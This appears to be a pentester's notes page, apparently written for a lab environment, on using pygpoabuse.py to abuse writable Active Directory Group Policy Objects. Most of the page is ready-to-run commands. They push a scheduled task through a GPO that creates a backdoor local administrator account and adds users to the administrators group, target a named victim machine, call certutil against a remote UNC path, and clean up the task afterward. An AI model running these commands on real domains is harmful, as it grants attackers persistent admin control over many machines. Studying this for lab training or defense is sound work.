# pygpoabuse.py Very cool utility to abuse GPO objects where you have excessive permissions, such as `GenericWrite`. Here's an example: ``` pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" -v ``` In the command above: * `THE ID YOU COPIED MINUS THE CURLY BRACES` - is exactly that: the ID you copy off the GPO in BloodHound, *minus* the curly braces. * `BACKDOORUSER` would be a local admin account you want to install on the system. * `Mypass123!` - is the password that will be assigned to your backdoor account. **IMPORTANT: MAKE THE PASSWORD FEWER THAN 14 CHARACTERS!** * `-taskname "Whatever you wanna call the task"` - is exactly that: some name for the scheduled task that gets queued up behind the scenes. * `-v` - adds verbosity !!!tip Tip When using this to summon a command such as `-command "certutil -syncwithwu \\\\10.1.2.3"` you'll want to escape backslashes in a UNC path with double backslashes. !!! !!!tip Tip #2 If you run this script without a `-command` flag, it will insert a scheduled task that has a payload of something like: ``` net user administrator7 S3cr3bkd00r! /add && net localgroup Administrators administrator7 /add ``` I'm not 100% on this, but I think you *need* to use `&&` and not literally `&&` in the .xml file or the task will fail. !!! !!!tip Tip #3 If you want to target your payload to only fire on a specific machine name, use the `if` command like so: ``` if /i "%COMPUTERNAME%"=="VICTIM-PC-LOL" net user administrator7 S3cr3bkd00r! /add && net localgroup Administrators administrator7 /add ``` !!! !!!tip Tip #4 To cleanup the `ScheduledTasks.xml` it's the same command as you did to create the task, but with `--cleanup` added: ``` pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "THE ID YOU COPIED MINUS THE CURLY BRACES" -command "net user BACKDOORUSER Mypass123! /add && net localgroup administrators YOURSTUDENTLOGIN /add" -taskname "Whatever you wanna call the task" --cleanup -v ``` * `--cleanup` - cleans up (deletes) the task after it runs !!!